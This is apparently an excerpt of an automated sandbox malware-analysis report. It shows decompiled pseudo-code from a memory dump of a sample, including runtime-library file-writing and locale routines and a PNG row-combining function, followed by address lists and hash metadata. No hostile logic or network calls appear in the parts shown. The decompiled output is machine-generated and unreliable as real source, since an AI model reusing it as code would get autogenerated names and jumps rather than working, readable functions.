											_t294 = _t294 + 1;
											_v6881 = _t390;
											__eflags = _t390 - 0xa;
											_t391 = _v6852;
											_v6856 = _t407 + 1;
											if(_t390 == 0xa) {
												_v6872 = _v6872 + 1;
												 *_t365 = 0xd;
												_t365 = _t365 + 1;
												_t391 = _t391 + 1;
												__eflags = _t391;
											}
											 *_t365 = _v6881;
											_t407 = _v6856;
											_t365 = _t365 + 1;
											_t392 = _t391 + 1;
											_v6852 = _t392;
											__eflags = _t392 - 0x13ff;
										} while (_t392 < 0x13ff);
										_t366 = _t365 -  &_v6844;
										_t300 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4))),  &_v6844, _t366,  &_v6876, 0);
										__eflags = _t300;
										if(_t300 == 0) {
											goto L92;
										}
										_t414 = _t414 + _v6876;
										_t403 = _v6848;
										__eflags = _v6876 - _t366;
										if(_v6876 < _t366) {
											goto L94;
										}
										__eflags = _v6856 - _t403 - _a12;
										_t293 = _v6856;
									} while (_v6856 - _t403 < _a12);
									goto L94;
								} else {
									__eflags =  *(_t422 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4)) + 4) & 0x00000080;
									if(__eflags == 0) {
										goto L50;
									}
									_t305 = L0043CC0F(_t414, __eflags);
									__eflags =  *( *((intOrPtr*)(_t305 + 0x6c)) + 0xa8);
									_v6852 = 0 |  *( *((intOrPtr*)(_t305 + 0x6c)) + 0xa8) == 0x00000000;
									_t310 = GetConsoleMode( *(_t422 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4))),  &_v6888);
									__eflags = _t310;
									if(_t310 == 0) {
										goto L50;
									}
									__eflags = _v6852 - _t414;
									if(_v6852 == _t414) {
										L16:
										_t311 = GetConsoleCP();
										_t403 = _v6848;
										_v6880 = _v6880 & _t414;
										_t395 = _t403;
										_v6900 = _t311;
										_v6864 = _t395;
										__eflags = _a12 - _t414;
										if(_a12 <= _t414) {
											_t423 = _v6852;
											L95:
											__eflags = _t423;
											if(_t423 == 0) {
												L99:
												__eflags =  *(_v6896 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4)) + 4) & 0x00000040;
												if(__eflags == 0) {
													L102:
													 *((intOrPtr*)(L00437D6A(__eflags))) = 0x1c;
													_t267 = L00437D36(__eflags);
													 *_t267 =  *_t267 & 0x00000000;
													__eflags =  *_t267;
													L103:
													_t262 = _t267 | 0xffffffff;
													L105:
													_pop(_t419);
													_pop(_t357);
													L106:
													return L00436D7B(_t262, _t357, _v8 ^ _t428, _t403, _t414, _t419);
												}
												__eflags =  *_t403 - 0x1a;
												if(__eflags != 0) {
													goto L102;
												}
												_t262 = 0;
												goto L105;
											}
											_t361 = 5;
											__eflags = _t423 - _t361;
											if(__eflags != 0) {
												_t267 = L00437D49(_t423);
											} else {
												 *((intOrPtr*)(L00437D6A(__eflags))) = 9;
												_t267 = L00437D36(__eflags);
												 *_t267 = _t361;
											}
											goto L103;
										}
										__eflags = 0;
										_v6860 = 0;
										_v6892 = 0xa;
										do {
											__eflags = _t360;
											if(_t360 != 0) {
												__eflags = _t360 - 1;
												if(_t360 == 1) {
													L37:
													_t313 =  *_t395 & 0x0000ffff;
													__eflags = _t313 - _v6892;
													_v6856 = _t313;
													_t395 =  &(_t395[1]);
													_t315 = _v6860 + 2;
													__eflags = _t315;
													_v6864 = _t395;
													_v6860 = _t315;
													_v6852 = 0 | _t313 == _v6892;
													L38:
													__eflags = _t360 - 1;
													if(_t360 == 1) {
														L40:
														_t316 = L00444B84(_t395, _v6856);
														_pop(_t396);
														__eflags = _t316 - _v6856;
														if(_t316 != _v6856) {
															L92:
															_t423 = GetLastError();
															L93:
															_t403 = _v6848;
															L94:
															__eflags = _t414;
															if(_t414 != 0) {
																_t414 = _t414 - _v6872;
																__eflags = _t414;
																_t262 = _t414;
																goto L105;
															}
															goto L95;
														}
														_t414 = _t414 + 2;
														__eflags = _v6852;
														if(_v6852 == 0) {
															L44:
															_t315 = _v6860;
															_t395 = _v6864;
															goto L45;
														}
														_t349 = 0xd;
														_v6856 = _t349;
														_t350 = L00444B84(_t396, _t349);
														__eflags = _t350 - _v6856;
														if(_t350 != _v6856) {
															goto L92;
														}
														_t414 = _t414 + 1;
														_t118 =  &_v6872;
														 *_t118 = _v6872 + 1;
														__eflags =  *_t118;
														goto L44;
													}
													__eflags = _t360 - 2;
													if(_t360 != 2) {
														goto L45;
													}
													goto L40;
												}
												__eflags = _t360 - 2;
												if(_t360 != 2) {
													goto L38;
												}
												goto L37;
											}
											_t397 =  *_t395;
											__eflags = _t397 - 0xa;
											_v6852 = 0 | _t397 == 0x0000000a;
											_t412 =  *((intOrPtr*)(0x46c2a0 + _v6868 * 4));
											__eflags =  *(_t422 + _t412 + 0x38);
											if( *(_t422 + _t412 + 0x38) == 0) {
												_t321 = L00441B0B(_t397);
												__eflags = _t321;
												if(_t321 == 0) {
													_push(1);
													_push(_v6864);
													L26:
													_push( &_v6856);
													_t323 = L00444B6C();
													_t429 = _t429 + 0xc;
													__eflags = _t323 - 0xffffffff;
													if(_t323 == 0xffffffff) {
														L48:
														_t423 = _v6852;
														goto L93;
													}
													_t324 = _v6864;
													L28:
													_v6860 = _v6860 + 1;
													_v6864 = _t324 + 1;
													_t328 = WideCharToMultiByte(_v6900, 0,  &_v6856, 1,  &_v16, 5, 0, 0);
													_v6888 = _t328;
													__eflags = _t328;
													if(_t328 == 0) {
														goto L48;
													}
													_t332 = WriteFile( *(_t422 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4))),  &_v16, _t328,  &_v6880, 0);
													__eflags = _t332;
													if(_t332 == 0) {
														goto L92;
													}
													_t414 = _v6860 + _v6872;
													__eflags = _v6880 - _v6888;
													if(_v6880 < _v6888) {
														goto L48;
													}
													__eflags = _v6852;
													if(_v6852 == 0) {
														goto L44;
													}
													_v16 = 0xd;
													_t338 = WriteFile( *(_t422 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4))),  &_v16, 1,  &_v6880, 0);
													__eflags = _t338;
													if(_t338 == 0) {
														goto L92;
													}
													__eflags = _v6880 - 1;
													if(_v6880 < 1) {
														goto L48;
													}
													_v6872 = _v6872 + 1;
													_t414 = _t414 + 1;
													goto L44;
												}
												_t413 = _v6864;
												__eflags = _v6848 - _t413 + _a12 - 1;
												if(_v6848 - _t413 + _a12 <= 1) {
													_t367 = _v6868;
													_t414 = _t414 + 1;
													__eflags = _t414;
													 *((char*)(_t422 +  *((intOrPtr*)(0x46c2a0 + _t367 * 4)) + 0x34)) =  *_t413;
													 *(_t422 +  *((intOrPtr*)(0x46c2a0 + _t367 * 4)) + 0x38) = 1;
													goto L48;
												}
												_t345 = L00444B6C( &_v6856, _t413, 2);
												_t429 = _t429 + 0xc;
												__eflags = _t345 - 0xffffffff;
												if(_t345 == 0xffffffff) {
													goto L48;
												}
												_t324 = _v6864 + 1;
												_v6860 = _v6860 + 1;
												goto L28;
											}
											_v16 =  *((intOrPtr*)(_t422 + _t412 + 0x34));
											_push(2);
											_v15 = _t397;
											 *(_t422 + _t412 + 0x38) =  *(_t422 + _t412 + 0x38) & 0x00000000;
											_push( &_v16);
											goto L26;
											L45:
											__eflags = _t315 - _a12;
										} while (_t315 < _a12);
										goto L48;
									}
									__eflags = _t360;
									if(_t360 == 0) {
										goto L50;
									}
									goto L16;
								}
							}
							 *(L00437D36(__eflags)) =  *_t352 & _t414;
							 *((intOrPtr*)(L00437D6A(__eflags))) = 0x16;
							_t267 = E00439520();
							goto L103;
						}
						__eflags = _t360 - 1;
						if(_t360 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(L00437D36(__eflags)) =  *_t354 & 0;
					 *((intOrPtr*)(L00437D6A(__eflags))) = 0x16;
					_t262 = E00439520() | 0xffffffff;
					goto L106;
				}
				_t262 = 0;
				goto L106;
			}

0x004398db
0x004398db
0x004398e3
0x004398e8
0x004398ef
0x004398f2
0x004398f5
0x004398f8
0x004398fb
0x004398fd
0x00439903
0x00439909
0x0043990f
0x00439918
0x00439921
0x00439923
0x00439944
0x00439945
0x00439948
0x00439950
0x00439953
0x00439959
0x00439960
0x0043996c
0x0043996e
0x00439971
0x00439978
0x0043997d
0x0043997f
0x0043999d
0x004399a3
0x004399a3
0x004399a8
0x004399af
0x004399b4
0x004399b4
0x004399bd
0x004399c3
0x004399c5
0x00439ce3
0x00439ce9
0x00439cf0
0x00439cf5
0x0043a065
0x0043a06b
0x0043a06d
0x00000000
0x00000000
0x0043a06f
0x0043a075
0x00000000
0x0043a075
0x00439cfb
0x00439d01
0x00439d03
0x00439d09
0x00439d0b
0x00439df2
0x00439df4
0x00439df7
0x00439efb
0x00439efe
0x00439f04
0x00439f06
0x00000000
0x00000000
0x00439f0c
0x00439f16
0x00439f16
0x00439f1d
0x00439f23
0x00439f23
0x00439f25
0x00439f2b
0x00439f31
0x00439f31
0x00439f33
0x00000000
0x00000000
0x00439f35
0x00439f38
0x00439f3b
0x00439f3e
0x00439f44
0x00439f4b
0x00439f4f
0x00439f50
0x00439f53
0x00439f59
0x00439f5c
0x00439f5c
0x00439f5c
0x00439f5f
0x00439f62
0x00439f65
0x00439f68
0x00439f68
0x00439f88
0x00439f97
0x00439f9d
0x00439fa3
0x00439fa9
0x00439faf
0x00439fb1
0x00000000
0x00000000
0x00439fb7
0x00439fb7
0x00439fb9
0x00439fbf
0x00439fea
0x00439ff0
0x00439ff2
0x00000000
0x00000000
0x00439ffa
0x0043a000
0x0043a006
0x0043a00c
0x0043a00e
0x00000000
0x00000000
0x0043a02c
0x0043a02c
0x0043a02e
0x00000000
0x00000000
0x00000000
0x0043a02e
0x0043a012
0x0043a018
0x0043a01e
0x0043a020
0x0043a026
0x00000000
0x0043a030
0x0043a030
0x0043a036
0x0043a03e
0x0043a040
0x0043a046
0x0043a046
0x00000000
0x0043a04e
0x00439dfd
0x00439e03
0x00439e06
0x00000000
0x00000000
0x00439e0c
0x00439e16
0x00439e16
0x00439e1d
0x00439e25
0x00439e25
0x00439e27
0x00439e2d
0x00439e33
0x00439e33
0x00439e36
0x00000000
0x00000000
0x00439e38
0x00439e3b
0x00439e3e
0x00439e41
0x00439e47
0x00439e4e
0x00439e52
0x00439e53
0x00439e56
0x00439e5c
0x00439e5f
0x00439e62
0x00439e62
0x00439e62
0x00439e65
0x00439e68
0x00439e6b
0x00439e6e
0x00439e6e
0x00439e82
0x00439e9b
0x00439eab
0x00439eb1
0x00439eb7
0x00439ebd
0x00439ebf
0x00000000
0x00000000
0x00439ec5
0x00439ecb
0x00439ed1
0x00439ed7
0x00439edd
0x00000000
0x00000000
0x00439ee3
0x00439eed
0x00439eed
0x00000000
0x00439ef6
0x00439d11
0x00439d13
0x00439d19
0x00439d1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00439d22
0x00439d22
0x00439d24
0x00439d24
0x00439d26
0x00439d2c
0x00439d32
0x00439d38
0x00439d38
0x00439d3b
0x00000000
0x00000000
0x00439d3d
0x00439d40
0x00439d41
0x00439d47
0x00439d4a
0x00439d50
0x00439d56
0x00439d58
0x00439d5e
0x00439d61
0x00439d62
0x00439d62
0x00439d62
0x00439d69
0x00439d6b
0x00439d71
0x00439d72
0x00439d73
0x00439d79
0x00439d79
0x00439d8d
0x00439db0
0x00439db6
0x00439db8
0x00000000
0x00000000
0x00439dbe
0x00439dc4
0x00439dca
0x00439dd0
0x00000000
0x00000000
0x00439dde
0x00439de1
0x00439de1
0x00000000
0x004399cb
0x004399d8
0x004399dd
0x00000000
0x00000000
0x004399e3
0x004399ed
0x00439a0d
0x00439a13
0x00439a19
0x00439a1b
0x00000000
0x00000000
0x00439a21
0x00439a27
0x00439a31
0x00439a31
0x00439a37
0x00439a3d
0x00439a43
0x00439a45
0x00439a4b
0x00439a51
0x00439a54
0x00439cd8
0x0043a08b
0x0043a08b
0x0043a08d
0x0043a0b3
0x0043a0c6
0x0043a0cb
0x0043a0d6
0x0043a0db
0x0043a0e1
0x0043a0e6
0x0043a0e6
0x0043a0e9
0x0043a0e9
0x0043a0f6
0x0043a0f6
0x0043a0f7
0x0043a0f8
0x0043a104
0x0043a104
0x0043a0cd
0x0043a0d0
0x00000000
0x00000000
0x0043a0d2
0x00000000
0x0043a0d2
0x0043a091
0x0043a092
0x0043a094
0x0043a0ab
0x0043a096
0x0043a09b
0x0043a0a1
0x0043a0a6
0x0043a0a6
0x00000000
0x0043a094
0x00439a5a
0x00439a5c
0x00439a62
0x00439a6c
0x00439a6c
0x00439a6e
0x00439c03
0x00439c06
0x00439c0d
0x00439c0d
0x00439c12
0x00439c19
0x00439c28
0x00439c2b
0x00439c2b
0x00439c2e
0x00439c34
0x00439c3a
0x00439c40
0x00439c40
0x00439c43
0x00439c4a
0x00439c50
0x00439c55
0x00439c56
0x00439c5d
0x0043a079
0x0043a07f
0x0043a081
0x0043a081
0x0043a087
0x0043a087
0x0043a089
0x0043a0ee
0x0043a0ee
0x0043a0f4
0x00000000
0x0043a0f4
0x00000000
0x0043a089
0x00439c63
0x00439c66
0x00439c6d
0x00439c93
0x00439c93
0x00439c99
0x00000000
0x00439c99
0x00439c71
0x00439c73
0x00439c79
0x00439c7f
0x00439c86
0x00000000
0x00000000
0x00439c8c
0x00439c8d
0x00439c8d
0x00439c8d
0x00000000
0x00439c8d
0x00439c45
0x00439c48
0x00000000
0x00000000
0x00000000
0x00439c48
0x00439c08
0x00439c0b
0x00000000
0x00000000
0x00000000
0x00439c0b
0x00439a74
0x00439a78
0x00439a7e
0x00439a8a
0x00439a91
0x00439a96
0x00439ab3
0x00439ab9
0x00439abb
0x00439b01
0x00439b03
0x00439b09
0x00439b0f
0x00439b10
0x00439b15
0x00439b18
0x00439b1b
0x00439ccd
0x00439ccd
0x00000000
0x00439ccd
0x00439b21
0x00439b27
0x00439b2c
0x00439b34
0x00439b4e
0x00439b54
0x00439b5a
0x00439b5c
0x00000000
0x00000000
0x00439b80
0x00439b86
0x00439b88
0x00000000
0x00000000
0x00439b9a
0x00439ba0
0x00439ba6
0x00000000
0x00000000
0x00439bac
0x00439bb3
0x00000000
0x00000000
0x00439bce
0x00439bdc
0x00439be2
0x00439be4
0x00000000
0x00000000
0x00439bea
0x00439bf1
0x00000000
0x00000000
0x00439bf7
0x00439bfd
0x00000000
0x00439bfd
0x00439ac3
0x00439ace
0x00439ad1
0x00439caa
0x00439cb9
0x00439cb9
0x00439cba
0x00439cc5
0x00000000
0x00439cc5
0x00439ae1
0x00439ae6
0x00439ae9
0x00439aec
0x00000000
0x00000000
0x00439af8
0x00439af9
0x00000000
0x00439af9
0x00439a9c
0x00439a9f
0x00439aa4
0x00439aa7
0x00439aac
0x00000000
0x00439c9f
0x00439c9f
0x00439c9f
0x00000000
0x00439ca8
0x00439a29
0x00439a2b
0x00000000
0x00000000
0x00000000
0x00439a2b
0x004399c5
0x00439986
0x0043998d
0x00439993
0x00000000
0x00439993
0x00439973
0x00439976
0x00000000
0x00000000
0x00000000
0x00439976
0x0043992a
0x00439931
0x0043993c
0x00000000
0x0043993c
0x0043991a
0x00000000

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53336f018b2b50127f15dc06e3000a504fb49e7958b747e915b381e309a78aff
Instruction ID: 3cf5e9ee33971ec879f73c81ebfea48d347f61cc0261d9ac7af46364932ecc15
Opcode Fuzzy Hash: 53336f018b2b50127f15dc06e3000a504fb49e7958b747e915b381e309a78aff
Instruction Fuzzy Hash: 84326E75B022688BDB248F55DD80AEAB7F5FB4A314F0450DAE44AE3B80D7749E81CF46

Uniqueness

Uniqueness Score: -1,00%

Function 00446F0E, Relevance: 15.2, APIs: 10, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

_memset.LIBCMT ref: 00446F44
_TranslateName.LIBCMT ref: 00446F8F
_TranslateName.LIBCMT ref: 00446FDA
GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00447027

Part of subcall function 004380DB: _GetTableIndexFromLcid.LIBCMT ref: 00438108
Part of subcall function 004380DB: _wcsnlen.LIBCMT ref: 0043811C

IsValidCodePage.KERNEL32(00000000), ref: 0044707B
IsValidLocale.KERNEL32(?,00000001), ref: 0044708E
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 004470E1
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004470F8
__itow_s.LIBCMT ref: 0044710A

Part of subcall function 0044AF2E: _xtow_s@20.LIBCMT ref: 0044AF50

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Locale$InfoNameTranslateValid$CodeDefaultFromIndexLcidPageTableUser__getptd_noexit__itow_s_memset_wcsnlen_xtow_s@20
String ID:
API String ID: 3898403912-0
Opcode ID: 9814c305452c4a6eda1e53effbb2b9681e307cb197c3c8502bfa4eb2f99d1b1d
Instruction ID: 57e2fdd9b78aed88e080bdd5030c3f1f397678e3250aa8d1f80150437d18f132
Opcode Fuzzy Hash: 9814c305452c4a6eda1e53effbb2b9681e307cb197c3c8502bfa4eb2f99d1b1d
Instruction Fuzzy Hash: B7519571A042199AFF10EFA5DC41ABB73B8EF05744F15042BE900DB281E778DD45CB6A

Uniqueness

Uniqueness Score: -1,00%

Function 00419400, Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00419400(intOrPtr _a4, signed char* _a8, intOrPtr _a12) {
				signed char _v5;
				signed char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed char* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed char* _v64;
				signed char* _v68;
				signed int _v72;
				signed int _v76;
				signed char* _v80;
				signed char* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _t405;
				char* _t408;
				signed int _t413;
				signed char _t423;
				signed char* _t427;
				char* _t430;
				signed int _t434;
				void* _t438;
				signed int _t450;
				signed char* _t456;
				signed int _t467;
				signed char* _t473;
				signed int _t519;
				signed int _t577;
				signed int _t593;
				intOrPtr _t683;
				signed int _t698;
				signed int _t711;
				void* _t743;

				_v16 =  *(_a4 + 0x157) & 0x000000ff;
				_v12 =  *((intOrPtr*)(_a4 + 0x124)) + 1;
				_v24 =  *((intOrPtr*)(_a4 + 0x100));
				_v32 =  *(_a4 + 0x14d) & 0x000000ff;
				_v28 = 0;
				_v5 = 0;
				if(_v16 == 0) {
					E0041B170(_a4, "internal row logic error");
				}
				if( *((intOrPtr*)(_a4 + 0x130)) != 0) {
					if(_v16 < 8) {
						_v92 = _v24 * _v16 + 7 >> 3;
					} else {
						_v92 = (_v16 >> 3) * _v24;
					}
					if( *((intOrPtr*)(_a4 + 0x130)) != _v92) {
						E0041B170(_a4, "internal row size calculation error");
					}
				}
				if(_v24 == 0) {
					E0041B170(_a4, "internal row width error");
				}
				_t519 = _v16 * _v24 & 0x00000007;
				_v20 = _t519;
				if(_t519 != 0) {
					if(_v16 < 8) {
						_v96 = _v24 * _v16 + 7 >> 3;
					} else {
						_v96 = (_v16 >> 3) * _v24;
					}
					_t45 = _v96 - 1; // 0x7
					_v28 =  &(_a8[_t45]);
					_v5 =  *_v28;
					if(( *(_a4 + 0x7c) & 0x00010000) == 0) {
						_v20 = 0xff >> _v20;
					} else {
						_v20 = 0xff << _v20;
					}
				}
				if(( *(_a4 + 0x14c) & 0x000000ff) == 0 || ( *(_a4 + 0x7c) & 0x00000002) == 0 || _v32 >= 6 || _a12 != 0 && (_a12 != 1 || (_v32 & 0x00000001) == 0)) {
					if(_v16 < 8) {
						_v128 = _v24 * _v16 + 7 >> 3;
					} else {
						_v128 = (_v16 >> 3) * _v24;
					}
					_t405 = L00433F90(_a8, _v12, _v128);
					goto L113;
				} else {
					_t413 = (_v32 & 0x00000001) << 0x00000003 - (_v32 + 0x00000001 >> 0x00000001) & 0x00000007;
					if(_v24 > _t413) {
						if(_v16 >= 8) {
							if((_v16 & 0x00000007) != 0) {
								E0041B170(_a4, "invalid user transform pixel depth");
							}
							_v16 = _v16 >> 3;
							_v24 = _v24 * _v16;
							_v56 = ((_v32 & 0x00000001) << 0x00000003 - (_v32 + 0x00000001 >> 0x00000001) & 0x00000007) * _v16;
							_v24 = _v24 - _v56;
							_a8 =  &(_a8[_v56]);
							_v12 =  &(_v12[_v56]);
							if(_a12 == 0) {
								_v48 = _v16;
							} else {
								_v48 = (1 << 6 - _v32 >> 1) * _v16;
								if(_v48 > _v24) {
									_v48 = _v24;
								}
							}
							_v52 = (1 << 7 - _v32 >> 1) * _v16;
							_v124 = _v48;
							if(_v124 == 1) {
								goto L66;
							} else {
								if(_v124 == 2) {
									while(1) {
										 *_a8 =  *_v12;
										_t427 = _v12;
										_a8[1] =  *((intOrPtr*)(_t427 + 1));
										if(_v24 <= _v52) {
											break;
										}
										_v12 =  &(_v12[_v52]);
										_a8 =  &(_a8[_v52]);
										_v24 = _v24 - _v52;
										if(_v24 > 1) {
											continue;
										}
										_t430 = _a8;
										 *_t430 =  *_v12;
										return _t430;
									}
									return _t427;
								}
								if(_v124 == 3) {
									while(1) {
										 *_a8 =  *_v12;
										_a8[1] = _v12[1];
										_a8[2] = _v12[2];
										_t434 = _v24;
										if(_t434 <= _v52) {
											break;
										}
										_v12 =  &(_v12[_v52]);
										_a8 =  &(_a8[_v52]);
										_v24 = _v24 - _v52;
									}
									return _t434;
								}
								if(_v48 >= 0x10 || (_a8 & 1) != 0 || (_v12 & 1) != 0 || _v48 % 2 != 0 || _v52 % 2 != 0) {
									while(1) {
										_t438 = L00433F90(_a8, _v12, _v48);
										_t743 = _t743 + 0xc;
										if(_v24 <= _v52) {
											break;
										}
										_v12 =  &(_v12[_v52]);
										_a8 =  &(_a8[_v52]);
										_v24 = _v24 - _v52;
										if(_v48 > _v24) {
											_v48 = _v24;
										}
									}
									return _t438;
								} else {
									if((_a8 & 0x00000003) != 0 || (_v12 & 0x00000003) != 0 || _v48 % 4 != 0 || _v52 % 4 != 0) {
										_v84 = _a8;
										_v80 = _v12;
										_v76 = _v52 - _v48 >> 1;
										do {
											_v88 = _v48;
											do {
												 *_v84 =  *_v80;
												_v84 = _v84 + 2;
												_v80 = _v80 + 2;
												_t683 = _v88 - 2;
												_v88 = _t683;
											} while (_t683 != 0);
											_t450 = _v24;
											if(_t450 > _v52) {
												goto L99;
											}
											return _t450;
											L99:
											_v84 = _v84 + _v76 * 2;
											_v80 = _v80 + _v76 * 2;
											_v24 = _v24 - _v52;
										} while (_v48 <= _v24);
										_a8 = _v84;
										_v12 = _v80;
										do {
											 *_a8 =  *_v12;
											_a8 =  &(_a8[1]);
											_t456 =  &(_v12[1]);
											_v12 = _t456;
											_t577 = _v24 - 1;
											_v24 = _t577;
										} while (_t577 != 0);
										return _t456;
									} else {
										_v64 = _a8;
										_v68 = _v12;
										_v60 = _v52 - _v48 >> 2;
										do {
											_v72 = _v48;
											do {
												 *_v64 =  *_v68;
												_v64 = _v64 + 4;
												_v68 = _v68 + 4;
												_t698 = _v72 - 4;
												_v72 = _t698;
											} while (_t698 != 0);
											_t467 = _v24;
											if(_t467 > _v52) {
												goto L90;
											}
											return _t467;
											L90:
											_v64 = _v64 + _v60 * 4;
											_v68 = _v68 + _v60 * 4;
											_v24 = _v24 - _v52;
										} while (_v48 <= _v24);
										_a8 = _v64;
										_v12 = _v68;
										do {
											 *_a8 =  *_v12;
											_a8 =  &(_a8[1]);
											_t473 =  &(_v12[1]);
											_v12 = _t473;
											_t593 = _v24 - 1;
											_v24 = _t593;
										} while (_t593 != 0);
										return _t473;
									}
								}
								while(1) {
									L66:
									_t423 =  *_v12;
									 *_a8 = _t423;
									if(_v24 <= _v52) {
										break;
									}
									_a8 =  &(_a8[_v52]);
									_v12 =  &(_v12[_v52]);
									_v24 = _v24 - _v52;
								}
								return _t423;
							}
						}
						_v40 = 8 / _v16;
						if(( *(_a4 + 0x7c) & 0x00010000) == 0) {
							if(_a12 == 0) {
								if(_v16 != 1) {
									_v120 = (0 | _v16 != 0x00000002) + 1;
								} else {
									_v120 = 0;
								}
								_v116 =  *((intOrPtr*)(0x4505d0 + _v120 * 0x18 + _v32 * 4));
							} else {
								if(_v16 != 1) {
									_v112 = (0 | _v16 != 0x00000002) + 1;
								} else {
									_v112 = 0;
								}
								_v116 =  *((intOrPtr*)(0x45063c + _v112 * 0xc + (_v32 >> 1) * 4));
							}
							_v36 = _v116;
						} else {
							if(_a12 == 0) {
								if(_v16 != 1) {
									_v108 = (0 | _v16 != 0x00000002) + 1;
								} else {
									_v108 = 0;
								}
								_t98 = _v32 * 4; // 0x1010101
								_v104 =  *((intOrPtr*)(_v108 * 0x18 + _t98 + 0x450588));
							} else {
								if(_v16 != 1) {
									_v100 = (0 | _v16 != 0x00000002) + 1;
								} else {
									_v100 = 0;
								}
								_t86 = (_v32 >> 1) * 4; // 0xf0f0f0f0
								_v104 =  *((intOrPtr*)(_v100 * 0xc + _t86 + 0x450618));
							}
							_v36 = _v104;
						}
						while(1) {
							_v44 = _v36;
							_t405 = _v44 >> 0x00000008 | _v44 << 0x00000018;
							_v36 = _t405;
							_t711 = _v44 & 0x000000ff;
							_v44 = _t711;
							if(_t711 != 0) {
								if(_v44 == 0xff) {
									_t405 =  *_v12;
									 *_a8 = _t405;
								} else {
									_t405 = _a8;
									 *_t405 =  *_a8 & 0x000000ff &  !_v44 |  *_v12 & 0x000000ff & _v44;
								}
							}
							if(_v24 <= _v40) {
								break;
							}
							_v24 = _v24 - _v40;
							_a8 = _a8 + 1;
							_v12 = _v12 + 1;
						}
						L113:
						if(_v28 == 0) {
							return _t405;
						}
						_t408 = _v28;
						 *_t408 = _v5 & 0x000000ff & _v20 |  *_v28 & 0x000000ff &  !_v20;
						return _t408;
					}
					return _t413;
				}
			}

0x00419410
0x0041941f
0x0041942b
0x00419438
0x0041943b
0x00419442
0x0041944a
0x00419455
0x00419455
0x00419464
0x0041946a
0x00419488
0x0041946c
0x00419476
0x00419476
0x00419497
0x004194a2
0x004194a2
0x00419497
0x004194ab
0x004194b6
0x004194b6
0x004194c2
0x004194c5
0x004194c8
0x004194ce
0x004194ec
0x004194d0
0x004194da
0x004194da
0x004194f5
0x004194f9
0x00419501
0x00419510
0x0041952b
0x00419512
0x0041951c
0x0041951c
0x00419510
0x0041953a
0x00419b1d
0x00419b3b
0x00419b1f
0x00419b29
0x00419b29
0x00419b4a
0x00000000
0x00419575
0x0041958e
0x00419594
0x0041959f
0x00419732
0x0041973d
0x0041973d
0x00419748
0x00419752
0x00419775
0x0041977e
0x00419787
0x00419790
0x00419797
0x004197c4
0x00419799
0x004197ae
0x004197b7
0x004197bc
0x004197bc
0x004197bf
0x004197dc
0x004197e2
0x004197e9
0x00000000
0x004197eb
0x004197ef
0x00419834
0x0041983c
0x00419841
0x00419847
0x00419850
0x00000000
0x00000000
0x0041985d
0x00419866
0x0041986f
0x00419876
0x00000000
0x00000000
0x00419878
0x00419880
0x00000000
0x00419880
0x00000000
0x00419834
0x004197f5
0x00419887
0x0041988f
0x0041989a
0x004198a6
0x004198a9
0x004198af
0x00000000
0x00000000
0x004198bc
0x004198c5
0x004198ce
0x004198ce
0x00000000
0x00419887
0x004198d7
0x00419acb
0x00419ad7
0x00419adc
0x00419ae5
0x00000000
0x00000000
0x00419af2
0x00419afb
0x00419b04
0x00419b0d
0x00419b12
0x00419b12
0x00419b15
0x00000000
0x0041991f
0x00419925
0x00419a1a
0x00419a20
0x00419a2b
0x00419a2e
0x00419a31
0x00419a34
0x00419a3d
0x00419a46
0x00419a4f
0x00419a55
0x00419a58
0x00419a58
0x00419a5d
0x00419a63
0x00000000
0x00000000
0x00000000
0x00419a6a
0x00419a73
0x00419a7f
0x00419a88
0x00419a8e
0x00419a96
0x00419a9c
0x00419a9f
0x00419aa7
0x00419aaf
0x00419ab5
0x00419ab8
0x00419abe
0x00419ac1
0x00419ac1
0x00000000
0x0041995f
0x00419962
0x00419968
0x00419974
0x00419977
0x0041997a
0x0041997d
0x00419985
0x0041998d
0x00419996
0x0041999c
0x0041999f
0x0041999f
0x004199a4
0x004199aa
0x00000000
0x00000000
0x00000000
0x004199b1
0x004199ba
0x004199c6
0x004199cf
0x004199d5
0x004199dd
0x004199e3
0x004199e6
0x004199ee
0x004199f6
0x004199fc
0x004199ff
0x00419a05
0x00419a08
0x00419a08
0x00000000
0x004199e6
0x00419925
0x00419800
0x00419800
0x00419806
0x00419808
0x00419810
0x00000000
0x00000000
0x0041981d
0x00419826
0x0041982f
0x0041982f
0x00000000
0x00419800
0x004197e9
0x004195af
